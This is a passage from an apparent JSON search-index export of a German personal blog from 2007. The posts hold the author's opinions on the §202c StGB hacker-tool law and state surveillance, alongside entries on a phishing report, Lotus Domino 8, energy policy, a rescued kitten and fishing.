Gesetzesänderung liest.\nEiner der Kommentatoren meines Blog-Eintrags zum §202 StGB wirft mir zu wenig Recherche vor. Das mag erstmal so aussehen, da ich zum Zeitpunkt des Posts vorallem schnell meine Meinung und die Auslegung durch den CCC kundtun wollte.\nMit der Auslegung ist der CCC nicht allein:\neco – Verband Deutscher Internet Wirtschaft e.V. Computerkriminalität bekämpfen – nicht Sicherheitstechnik ausbremsen! Damit besteht die Gefahr, dass das Gesetz die Sicherheitsbemühungen der Unternehmen ausbremst, anstatt Computerkriminalität wirksam zu bekämpfen. Die dazu abgegebene Erklärung der Abgeordneten, wie das Gesetz auszulegen sei, reicht nicht aus, denn Gerichte urteilen nach dem Text des Gesetzes.\nHeise.de : Scharfe Kritik am neuen Hackerparagraphen Zitat aus Heise.de: Klarstellungen bei neuen Hackerparagraphen gefordert “Wenn es keine Änderung am 202c gibt, sollte man ihn lieber ganz streichen”, forderte der Würzburger Strafrechtsprofessor Erich Hilgendorf\n[…]\nCarl-Friedrich Stuckenberg, Privatdozent am Institut für Strafrecht der Universität Bonn, ging mit Hilfendorf konform. Mit dem 202c werde versucht, “eine Art Gefahrengutregime für bestimmte Arten von Software zu errichten”.\n[…]\nJürgen-Peter Graf, Richter am Bundesgerichtshof, hält die Vorverlagerung des Tatbestandsmerkmals ebenfalls für ein Problem. Die bestehenden Formulierungen seien aber grundsätzlich in der Lage, die Bedenken auszuräumen. In Richtung Computerpresse verwies er darauf, dass Hinweise auf Exploits von Sicherheitslücken und die Erteilung von Ratschlägen zu deren Anwendungen durchaus unter den neuen Straftatbestand fallen könnten. Dies sei gerechtfertigt, da so der Verbreitung von Schadsoftware entgegengewirkt würde.\nHeise Security: IT-Branchenverband gegen pauschales Verbot von “Hacker-Tools” Das Gesetz ist vom Grundgedanken her ja richtig, daß sich niemand die Daten von Anderen beschaffen kann, ohne sich strafbar zu machen, aber eine etwas eindeutigere Formulierung wäre auf jeden Fall angebracht gewesen. Rechtsexperten sind sich einig, daß die Formulierung zu schwammig ist.\nIch sehe vorallem die Gefahr darin, daß Hinweise auf Exploits nicht mehr veröffentlicht werden dürfen, da man dann nicht mehr im eigenen Netz Verwundbarkeiten prüfen kann.\nDa in diesem Bezug auch der §129a StGB genannt wird (Bildung einer terroristischen Vereinigung), befürchten manche Blogger, daß damit der CCC zu einer Terrorgruppe gemacht wird. In wie weit dies zutrifft, kann und will ich mich nicht äußern, aber ich denke auch hier wäre eine genauere Abgrenzung notwendig gewesen.\nAuf abgeordnetenwatch.de findet man bei Hans-Christian Ströbele (GRÜNE) die Klarstellung durch den Bundestag (unteres Drittel – sucht nach 202):\n[…] Sollten doch Programmentwickler und Firmen, die nicht aus krimineller Energie handeln, durch diese neuen Strafvorschriften in Ermittlungsverfahren einbezogen werden, wird auf solche Entwicklungen zeitnah reagiert werden müssen.\nAbschliessend bitte ich noch zu beachten, daß die Artikel dieses Blogs meine Meinung sind und sie niemandem gefallen müssen. Ich weiß auch, daß sich manche Artikel etwas einseitig anhören. Ich schreibe nicht komplette Artikel mit allen möglichen Blickrichtungen, sondern die Passagen, die mich aufregen.\nDanke trotzdem für die konstruktiven Kommentare!\n","excerpt":"\u003cp\u003eDie Überschrift ist sicher etwas krass formuliert, trifft aber das\nkomplette Spektrum der Aussagen, die man zur Gesetzesänderung liest.\u003c/p\u003e\n\u003cp\u003eEiner der Kommentatoren meines\n\u003ca href=\"https://www.stoeps.de/2007/05/25/ccc-202-stgb-offnet-bundestrojaner-tur-und-tor/\" target=\"_blank\"\u003eBlog-Eintrags\nzum §202 StGB \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n wirft mir zu wenig Recherche vor. Das mag erstmal so\naussehen, da ich zum Zeitpunkt des Posts vorallem schnell meine Meinung\nund die Auslegung durch den CCC kundtun wollte.\u003c/p\u003e\n\u003cp\u003eMit der Auslegung ist der CCC nicht allein:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.eco.de\" target=\"_blank\"\u003eeco – Verband Deutscher Internet Wirtschaft e.V. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.eco.de/servlet/PB/menu/1926020/index.html\" target=\"_blank\"\u003eComputerkriminalität\nbekämpfen – nicht Sicherheitstechnik ausbremsen! \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003cbr\u003e\nDamit besteht die Gefahr, dass das Gesetz die Sicherheitsbemühungen der\nUnternehmen ausbremst, anstatt Computerkriminalität wirksam zu\nbekämpfen. Die dazu abgegebene Erklärung der Abgeordneten, wie das\nGesetz auszulegen sei, reicht nicht aus, denn Gerichte urteilen nach dem\nText des Gesetzes.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-05-202-stgb-hackerpragraph-oder-das-aus-fur-deutsche-sicherheitsexperten/","title":"§202 StGB – Hackerpragraph oder das Aus für deutsche Sicherheitsexperten?"},{"body":"Nachdem ich mehrere Tage erfolglos versucht habe, meine Picasa Webalben in WordPress zu integrieren, habe ich jetzt Gallery2 mit dem WPG2-Plugin installiert und konfiguriert.\nDie Konfiguration war durch das selbst erstellte Theme etwas umständlicher, konnte aber durch eine zusätzliche wp2-header.php und wp2-footer.php angepaßt werden. Ich werde in nächster Zeit immer wieder Bilder auf der Seite online stellen und am linken Seitenrand ein Zufallsbild einblenden.\nBilder und Grafiken stehen unter einer Creative Commons Lizenz und können gemäß dem Lizenzvertrag genutzt werden:\nDieser Inhalt ist unter einer Creative Commons-Lizenz lizenziert. ","excerpt":"\u003cp\u003eNachdem ich mehrere Tage erfolglos versucht habe, meine\n\u003ca href=\"http://picasaweb.google.com/\" target=\"_blank\"\u003ePicasa \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Webalben in\n\u003ca href=\"http://www.wordpress.org\" target=\"_blank\"\u003eWordPress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zu integrieren, habe ich jetzt\n\u003ca href=\"http://www.gallery2.org\" target=\"_blank\"\u003eGallery2 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n mit dem\n\u003ca href=\"http://wpg2.galleryembedded.com\" target=\"_blank\"\u003eWPG2-Plugin \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n installiert und\nkonfiguriert.\u003c/p\u003e\n\u003cp\u003eDie Konfiguration war durch das selbst erstellte Theme etwas\numständlicher, konnte aber durch eine zusätzliche wp2-header.php und\nwp2-footer.php angepaßt werden. Ich werde in nächster Zeit immer wieder\nBilder auf der Seite online stellen und am linken Seitenrand ein\nZufallsbild einblenden.\u003c/p\u003e\n\u003cp\u003eBilder und Grafiken stehen unter einer\n\u003ca href=\"http://creativecommons.org/licenses/by-nc-sa/2.0/de/\" target=\"_blank\"\u003eCreative Commons\nLizenz \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und können gemäß dem Lizenzvertrag genutzt werden:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eDieser Inhalt ist unter einer Creative Commons-Lizenz lizenziert.\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","ref":"https://stoeps.de/posts/2007/2007-06-04-gallery-online/","title":"Gallery Online"},{"body":"heise online – Bundesratsausschüsse für deutlichen Ausbau der TK-Überwachung :\nDer Innenausschuss will zudem im Rahmen des Gesetzes eine Rechtsgrundlage für verdeckte Online-Durchsuchungen schaffen.\nJetzt hört man schon nicht auf Experten, die im Bundestag gehört wurden (siehe Beschluß §202c StGB ), sondern bastelt als Laie an diesen Überwachungswerkzeugen. :-(\nIch frage mich wirklich, warum man bei uns so viel Angst schüren kann, ohne daß ein Aufschrei durch die Bevölkerung erfolgt. Seit September 2001 werden unsere Rechte durch fiktive Bedrohungen beschnitten.\nFür die Installation des benötigten “Trojaners” oder anderer Spionagesoftware sieht der Innenausschuss keinen Regelungsbedarf. Notwendige Beeinträchtigungen des Betroffenen durch typische Vorbereitungs- oder Begleitmaßnahmen seien durch die Norm gedeckt.\nNa toll, das heißt keiner haftet für Datenverlust, den Betroffene (eventuell Unschuldige) durch die Installation des Trojaners, oder durch das Ausnutzen eines Exploits haben können.\nDie vorgeschlagene Anhebung der Grenze von 1000 auf 10.000 Teilnehmer als Kriterium für das Privileg sei nicht gerechtfertigt.\nAha, also Internetprovider unter 1000 Benutzer müssen nicht überwachen. Wie sieht das eigentlich mit dem Deutschen Forschungsnetz aus? An dem sind fast alle deutschen Universitäten angeschlossen. Muß auch hier eine teure Überwachungshard- und Software installiert werden? Wie will man sich vor Wirtschaftsspionage schützen?\nDer Entwurf bringe ferner “eine erhebliche Verschlechterung der präventiven Nutzungsmöglichkeit von Daten aus strafrechtlichen Ermittlungsverfahren” mit sich, kritisieren die Innenpolitiker weiter.\nDas wird dann meiner Meinung nach der Freibrief für die allgemeine Rasterfahndung.\nMeine Auswanderungswünsche werden wieder stärker…\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/90466\" target=\"_blank\"\u003eheise online –\nBundesratsausschüsse für deutlichen Ausbau der TK-Überwachung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDer Innenausschuss will zudem im Rahmen des Gesetzes eine\nRechtsgrundlage für verdeckte Online-Durchsuchungen schaffen.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eJetzt hört man schon nicht auf Experten, die im Bundestag gehört wurden\n(\u003ca href=\"http://www.heise.de/newsticker/meldung/90223\" target=\"_blank\"\u003esiehe Beschluß §202c\nStGB \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n), sondern bastelt als Laie an diesen Überwachungswerkzeugen. :-(\u003c/p\u003e\n\u003cp\u003eIch frage mich wirklich, warum man bei uns so viel Angst schüren kann,\nohne daß ein Aufschrei durch die Bevölkerung erfolgt. Seit September\n2001 werden unsere Rechte durch fiktive Bedrohungen beschnitten.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eFür die Installation des benötigten “Trojaners” oder anderer\nSpionagesoftware sieht der Innenausschuss keinen Regelungsbedarf.\nNotwendige Beeinträchtigungen des Betroffenen durch typische\nVorbereitungs- oder Begleitmaßnahmen seien durch die Norm gedeckt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-31-heise-online-bundesratsausschusse-fur-deutlichen-ausbau-der-tk-uberwachung/","title":"heise online – Bundesratsausschüsse für deutlichen Ausbau der TK-Überwachung"},{"body":"TP: Drei unbequeme Wahrheiten :\nKaum ein Thema bewegt die Gemüter heute mehr als die Energieproblematik, zumal hier ganz verschiedene Sektoren wie Wirtschaftsfragen, Risikosicherheit und – nicht zuletzt – der Umweltschutz eine Rolle spielen.\nEin wirklich interessanter Artikel, den ich jedem empfehlen kann. Der Autor Peter Riedberger hat meiner Meinung nach Recht.\nDer größte Teil der fossilen Energiequellen wird aufgebraucht werden. Das Grundlastproblem muss gelöst werden und der liberalisierte Strommarkt und der Energiemix sind zwar nett, aber keinen Pfifferling wert. Niemand schickt Strom von x nach y, sondern lokal produzierter Strom kommt zum Kunden und wird über mehrere Ecken, Im- und Exporte verschleiert.\nIch möchte nicht falsch verstanden werden! Ich bin für CO2-Einsparung, nachhaltiger Energiewirtschaft und gegen Atomstrom, aber das muss in die Köpfe der Leute rein und nicht über sogenannte Strom-Mix-Tabellen verschleiert werden.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.heise.de/tp/r4/artikel/25/25334/1.html\" target=\"_blank\"\u003eTP: Drei unbequeme\nWahrheiten \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eKaum ein Thema bewegt die Gemüter heute mehr als die Energieproblematik,\nzumal hier ganz verschiedene Sektoren wie Wirtschaftsfragen,\nRisikosicherheit und – nicht zuletzt – der Umweltschutz eine Rolle\nspielen.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eEin wirklich interessanter Artikel, den ich jedem empfehlen kann. Der\nAutor Peter Riedberger hat meiner Meinung nach Recht.\u003c/p\u003e\n\u003cp\u003eDer größte Teil der fossilen Energiequellen wird aufgebraucht werden.\nDas Grundlastproblem muss gelöst werden und der liberalisierte\nStrommarkt und der Energiemix sind zwar nett, aber keinen Pfifferling\nwert. Niemand schickt Strom von x nach y, sondern lokal produzierter\nStrom kommt zum Kunden und wird über mehrere Ecken, Im- und Exporte\nverschleiert.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-30-tp-unbequeme-betrachtungen-zum-okostrom/","title":"TP: Unbequeme Betrachtungen zum Ökostrom"},{"body":"Strange spoofing technique evades anti-phishing filters | The Register :\nA Reg reader has produced screen shots that demonstrate a powerful phishing technique that’s able to spoof eBay, PayPal and other top web destinations without triggering antiphishing filters in IE 7 or Norton 360. Plenty of other PayPal users are experiencing the same ruse, according to search engine results.\nInteressante Spoofing Attacke! Also bitte aufpassen, bzw. den IE meiden. :-)\nSiehe auch: http://www.schneier.com/blog/archives/2007/05/interesting_spo.html ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.theregister.co.uk/2007/05/25/strange_spoofing_technique/\" target=\"_blank\"\u003eStrange\nspoofing technique evades anti-phishing filters | The Register \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eA Reg reader has produced screen shots that demonstrate a powerful\nphishing technique that’s able to spoof eBay, PayPal and other top web\ndestinations without triggering antiphishing filters in IE 7 or Norton\n360. Plenty of other PayPal users are experiencing the same ruse,\naccording to search engine results.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eInteressante Spoofing Attacke! Also bitte aufpassen, bzw. den IE meiden.\n:-)\u003c/p\u003e\n\u003ch1 id=\"siehe-auch\"\u003eSiehe auch: \u003ca href=\"#siehe-auch\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003ca href=\"http://www.schneier.com/blog/archives/2007/05/interesting_spo.html\" target=\"_blank\"\u003ehttp://www.schneier.com/blog/archives/2007/05/interesting_spo.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-29-schneier-on-security-interesting-spoofing-attack/","title":"Schneier on Security: Interesting Spoofing Attack"},{"body":"CHiLLi.cc – Österreichs unabhängige Jugendseite :\nDie Merkel wird sich da oben in Heiligendamm feiern lassen als die Klimapäpstin und sie genehmigt Braunkohlekraftwerke. Ist die noch ganz dicht? Scheiße! Wenigstens könnte man das so machen, dass man ein Kraftwerk baut, wo man das CO2 richtig tief in die Erde pumpt und damit Mineralwasser macht oder so was. Einfach einmal um zu zeigen, dass das geht. Aber nein, wir bauen Braunkohlekraftwerke. Und die Frau ist Physikerin, oder war es zumindest mal. Ist doch kacke, Mensch.\nEin wirklich sehr interessantes Interview! Herr Lesch ist Astrophysiker und moderiert im BR-α die Sendung “Alpha Centauri”.\nHerr Lesch bringt es eigentlich ganz gut auf den Punkt, daß es z.B. Einstein noch einfach hatte, um einen Nobelpreis zu ergattern und es leider zu wenige Leute gibt, die große Bereiche überschauen können und nicht nur in ihrem Spezialgebiet gut sind.\nIch gebe ihm auf jeden Fall Recht, daß es bei uns zuviel Volks- und Betriebswirte gibt und zu wenige Ingenieure. Ich denke aber, daß daran v.a. unser Bildungssystem schuld ist.\nist ein Ingenieursstudium gesellschaftlich uncool\nsind viele Professoren einfach abgehoben und verstehen ihre Studenten nicht\nviele Ingenieure werden nach dem Studium wg. ihrer Mathekenntnisse von Finanzdienstleistern abgeworben\nEs zählt einfach nur Geld. Schade eigentlich.\nDie Sendung Alpha Centauri gibt es bei BR-α zum Onlineschauen: http://www.br-online.de/alpha/centauri/archiv.shtml .\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.chilli.cc/index.php?noframes=1\u0026amp;id=71-1-145\u0026amp;from=\" target=\"_blank\"\u003eCHiLLi.cc –\nÖsterreichs unabhängige Jugendseite \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDie Merkel wird sich da oben in Heiligendamm feiern lassen als die\nKlimapäpstin und sie genehmigt Braunkohlekraftwerke. Ist die noch ganz\ndicht? Scheiße! Wenigstens könnte man das so machen, dass man ein\nKraftwerk baut, wo man das CO2 richtig tief in die Erde pumpt und damit\nMineralwasser macht oder so was. Einfach einmal um zu zeigen, dass das\ngeht. Aber nein, wir bauen Braunkohlekraftwerke. Und die Frau ist\nPhysikerin, oder war es zumindest mal. Ist doch kacke, Mensch.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eEin wirklich sehr interessantes Interview! Herr Lesch ist Astrophysiker\nund moderiert im BR-α die Sendung “Alpha Centauri”.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-29-chillicc-interview-mit-harald-lesch/","title":"ChiLLi.cc – Interview mit Harald Lesch"},{"body":"Eine unserer Nachbarskatzen (Streuner) hat ihr Junges verstoßen und jetzt wohnt ein ca. 10 Tage alter Kater bei uns.\nZiemlich anstrengende Sache. Alle drei Stunden will der Kleine sein Fläschchen…\nUnser alter Kater hat ihn eigentlich ganz gut angenommen. Am ersten Tag war er noch ein bisschen eifersüchtig, aber jetzt geht er schon zu dem Kleinen hin und schnuppert an ihm.\n","excerpt":"\u003cp\u003eEine unserer Nachbarskatzen (Streuner) hat ihr Junges verstoßen und\njetzt wohnt ein ca. 10 Tage alter Kater bei uns.\u003c/p\u003e\n\u003cp\u003eZiemlich anstrengende Sache. Alle drei Stunden will der Kleine sein\nFläschchen…\u003c/p\u003e\n\u003cp\u003e  \u003c/p\u003e\n\u003cp\u003eUnser alter Kater hat ihn eigentlich ganz gut angenommen. Am ersten Tag\nwar er noch ein bisschen eifersüchtig, aber jetzt geht er schon zu dem\nKleinen hin und schnuppert an ihm.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-28-findelkatze/","title":"Findelkatze"},{"body":"Die neue Beta von Lotus Domino 8 ist zum Download verfügbar.\nDomino 8 ist ein sehr interessantes Produkt, das auf der Clientseite auf das Eclipse Framework, bzw. den Eclipse Richclient basiert. Er ist jetzt sehr modular aufgebaut und auch die Optik sieht sehr gut aus.\n","excerpt":"\u003cp\u003eDie neue Beta von Lotus Domino 8 ist zum\n\u003ca href=\"http://www-142.ibm.com/software/sw-lotus/products/product4.nsf/wdocs/betapage\" target=\"_blank\"\u003eDownload \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nverfügbar.\u003c/p\u003e\n\u003cp\u003eDomino 8 ist ein sehr interessantes Produkt, das auf der Clientseite auf\ndas Eclipse Framework, bzw. den Eclipse Richclient basiert. Er ist jetzt\nsehr modular aufgebaut und auch die Optik sieht sehr gut aus.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-25-lotus-domino-8-beta-3-zum-download-verfugbar/","title":"Lotus Domino 8 Beta 3 zum Download verfügbar"},{"body":"CCC | Verbot von Computersicherheitswerkzeugen öffnet Bundestrojaner Tür und Tor :\nDer Bundestag hat heute das Verbot von Computersicherheitswerkzeugen unverändert durchgewunken (Strafrechtsänderungsgesetz zur Bekämpfung der Computerkriminalität, neuer § 202 StGB). Bestraft werden soll insbesondere das Herstellen, Programmieren, Überlassen, Verbreiten oder Verschaffen von Software, die für die tägliche Arbeit von Netzwerkadministratoren und Sicherheitsexperten dringend notwendig ist. Damit handelten die Abgeordneten entgegen dem ausdrücklichen Rat der in den Ausschüssen bei der Beratung des Gesetzes gehörten Experten aus Wissenschaft und Praxis. Auch von Seiten der Internetwirtschaft und vom Bundesrat war die Gesetzesänderung scharf kritisiert worden.\nSchön langsam zweifle ich stark an diesen sogenannten Volksvertretern. Der Gesetzentwurf vom letzten Jahr, wurde ohne Änderungen durchgewunken.\nDurch die schwammige Fassung werden praktisch alle Tools, mit denen Computersicherheit überprüft werden kann, strafbar. Wie soll man bitte sein Netzwerk prüfen, wenn man die entsprechenden Tools nicht verwenden darf? Es wird sooft vom Standort Deutschland gefaselt, der BSI baut Linux-Distributionen, um die Sicherheit zu erhöhen, aber durch solche Gesetze steuern wir in eine zweifelhafte Richtung.\nDie Gefahr von Wirtschaftsspionage und der Verbreitung von Viren und (Bundes-)Trojanern steigt sprunghaft.\nWas kommt als Nächstes? Manchmal frage ich mich, ob ich vielleicht bei den Schildbürgern gelandet bin.\nDer CCC hat Recht, wenn er sagt:\n“Das allgemeine Verbot dieser Software ist etwa so hilfreich wie die Herstellung und den Verkauf von Hämmern zu verbieten, weil damit manchmal auch Sachbeschädigungen durchgeführt werden.”\nAls Lösung werden staatlich zertifizierte “vertrauenswürdige” Sicherheitsanbieter präsentiert. Das ist doch ein Witz! Das ist die staatlich subventionierte “Lizenz zum Gelddrucken”. Wenn man allein die Kosten heute betrachtet, die eine Sicherheitszertifizierung nach BSI verursacht, dann wird in Zukunft ein Penetrationtest unbezahlbar.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.ccc.de/updates/2007/paragraph-202c\" target=\"_blank\"\u003eCCC | Verbot von\nComputersicherheitswerkzeugen öffnet Bundestrojaner Tür und Tor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDer Bundestag hat heute das Verbot von Computersicherheitswerkzeugen\nunverändert durchgewunken (Strafrechtsänderungsgesetz zur Bekämpfung der\nComputerkriminalität, neuer § 202 StGB). Bestraft werden soll\ninsbesondere das Herstellen, Programmieren, Überlassen, Verbreiten oder\nVerschaffen von Software, die für die tägliche Arbeit von\nNetzwerkadministratoren und Sicherheitsexperten dringend notwendig ist.\nDamit handelten die Abgeordneten entgegen dem ausdrücklichen Rat der in\nden Ausschüssen bei der Beratung des Gesetzes gehörten Experten aus\nWissenschaft und Praxis. Auch von Seiten der Internetwirtschaft und vom\nBundesrat war die Gesetzesänderung scharf kritisiert worden.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eSchön langsam zweifle ich stark an diesen sogenannten Volksvertretern.\nDer Gesetzentwurf vom letzten Jahr, wurde ohne Änderungen durchgewunken.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-25-ccc-202-stgb-offnet-bundestrojaner-tur-und-tor/","title":"CCC – §202 StGB öffnet Bundestrojaner Tür und Tor"},{"body":"Ich war heute morgen angeln und leider erfolglos. Um 5:15 Uhr hatte ich sehr tief einen kleinen Hecht (ca. 50 cm) auf Shad gehakt. Nachdem ich ihn zurückgesetzt hatte, war erstmal nichts mehr.\nNach ca. 30 Minuten hatte ich dann einen Nachläufer bzw. schlecht gehakten Hecht mit ca. 75 cm, den ich nach wenigen Sekunden verlor. Diesen Biss hatte ich allerdings nicht tief, sondern direkt am Schilf in ca. 15 cm Wassertiefe. Als dann die Sonne richtig da war, hatte ich auch keine Bisse mehr.\nDas Wasser im Chiemsee ist momentan sehr klar und man sieht ca. 3 m in die Tiefe. Schockfarben schrecken scheinbar ab, transparente Köder werden ab und zu attakiert. Vielleicht haben die Alten ja Recht und man fängt wärend der Hollunderblüte wirklich nichts. Ich konnte zumindest die ganze Woche noch nichts ansehnliches an den Haken bekommen.\n","excerpt":"\u003cp\u003eIch war heute morgen angeln und leider erfolglos. Um 5:15 Uhr hatte ich\nsehr tief einen kleinen Hecht (ca. 50 cm) auf Shad gehakt. Nachdem ich\nihn zurückgesetzt hatte, war erstmal nichts mehr.\u003c/p\u003e\n\u003cp\u003eNach ca. 30 Minuten hatte ich dann einen Nachläufer bzw. schlecht\ngehakten Hecht mit ca. 75 cm, den ich nach wenigen Sekunden verlor.\nDiesen Biss hatte ich allerdings nicht tief, sondern direkt am Schilf in\nca. 15 cm Wassertiefe. Als dann die Sonne richtig da war, hatte ich auch\nkeine Bisse mehr.\u003c/p\u003e\n\u003cp\u003eDas Wasser im Chiemsee ist momentan sehr klar und man sieht ca. 3 m in\ndie Tiefe. Schockfarben schrecken scheinbar ab, transparente Köder\nwerden ab und zu attakiert. Vielleicht haben die Alten ja Recht und man\nfängt wärend der Hollunderblüte wirklich nichts. Ich konnte zumindest\ndie ganze Woche noch nichts ansehnliches an den Haken bekommen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-23-hollunderblute-und-hechte/","title":"Hollunderblüte und Hechte"},{"body":"Merkels Überwachungsstaat | .get privacy :\nEine Frau, die mittlerweile ihr wahres Gesicht zeigt, geht es doch bei der Überwachung nicht um schwere Vebrechen oder gar Terrorismus, nein es geht um Parksünder, das Anrempeln in der Fussgängerzone und das Müll wegschmeißen. Es geht üm die Überwachung der Bürger – denn Überwachte passen sich an.\nSehr interessant ist der im Artikel gezeigte Videoausschnitt einer Rede von Frau Merkel. Es ist wirklich toll, wenn unsere Steuergelder für sinnlose Videokameras verwendet werden, die offensichtlich keinerlei Nutzen haben, als angepaßte Bürger zu produzieren.\nEine gute Zusammenfassung in Sachen Videoüberwachung des öffentlichen Raums gibt es beim CCC . Videoüberwachung bringt bei Terror und ähnlichen Gefahren nichts. Wie war denn der Aufruf vor ein paar Tagen, als die G8-Razzien stattfanden? Es wurden zwei Fotos von Überwachungskameras veröffentlicht, auf denen praktisch jeder Mann, der zu dieser Zeit in Hamburg war verdächtig wäre.\nSuperausbeute! Die Kameras vereiteln verbrechen nicht! Sie verlagern sie höchstens, daher kann man sie ja praktisch nur so einsetzen, wie es unsere Bundeskanzlerin in dem Beitrag so lautstark verteidigt.\nJetzt kann sie noch nicht mal mehr Russland für Missachtung von Bürgerrechten rügen, da die G8-Razzien meiner Meinung nach sehr überzogen waren. Dadurch haben auch andere Staatsoberhäupter die Möglichkeit sich zu verteidigen, da ja Deutschland auch gegen Opposition und Versammlungsfreiheit vorgeht.\nLinks Telepolis Artikel: Vorsicht bei der Internetrecherche get-privacy.info ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.get-privacy.info/?p=495\" target=\"_blank\"\u003eMerkels Überwachungsstaat | .get\nprivacy \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eEine Frau, die mittlerweile ihr wahres Gesicht zeigt, geht es doch bei\nder Überwachung nicht um schwere Vebrechen oder gar Terrorismus, nein es\ngeht um Parksünder, das Anrempeln in der Fussgängerzone und das Müll\nwegschmeißen. Es geht üm die Überwachung der Bürger – denn Überwachte\npassen sich an.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eSehr interessant ist der im Artikel gezeigte Videoausschnitt einer Rede\nvon Frau Merkel. Es ist wirklich toll, wenn unsere Steuergelder für\nsinnlose Videokameras verwendet werden, die offensichtlich keinerlei\nNutzen haben, als angepaßte Bürger zu produzieren.\u003c/p\u003e\n\u003cp\u003eEine gute Zusammenfassung in Sachen\n\u003ca href=\"http://www.ccc.de/surveillance/?language=de/\" target=\"_blank\"\u003eVideoüberwachung des\nöffentlichen Raums \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n gibt es beim \u003ca href=\"http://www.ccc.de\" target=\"_blank\"\u003eCCC \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nVideoüberwachung bringt bei Terror und ähnlichen Gefahren nichts. Wie\nwar denn der Aufruf vor ein paar Tagen, als die\n\u003ca href=\"http://www.n-tv.de/800380.html\" target=\"_blank\"\u003eG8-Razzien \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n stattfanden? Es wurden\n\u003ca href=\"http://www.bka.de/fahndung/personen/tatkomplexe/militant_people/aktuelles/beschreibung.html\" target=\"_blank\"\u003ezwei\nFotos von Überwachungskameras \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n veröffentlicht, auf denen praktisch jeder\nMann, der zu dieser Zeit in Hamburg war verdächtig wäre.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-20-bagatell-verbrecher-sind-ziel-der-uberwacher/","title":"Bagatell-Verbrecher sind Ziel der Überwacher"},{"body":"BSI Newsletter Ausgabe 02/2007 :\nBSI entwickelt Live-CD für sicheres Surfen\nWenn Internetnutzer online einkaufen oder Bankgeschäfte erledigen, surft die Angst vor Viren, Trojanern und Phishern mit. Dafür gibt es Abhilfe: Wenn Sicherheit beim Surfen einmal besonders wichtig ist, kann der Rechner alternativ von einer CD mit einem speziell gesicherten Betriebssystem gestartet werden. Das BSI entwickelt derzeit zusammen mit Klaus Knopper und Martin Öhler, den Erfindern der berühmten 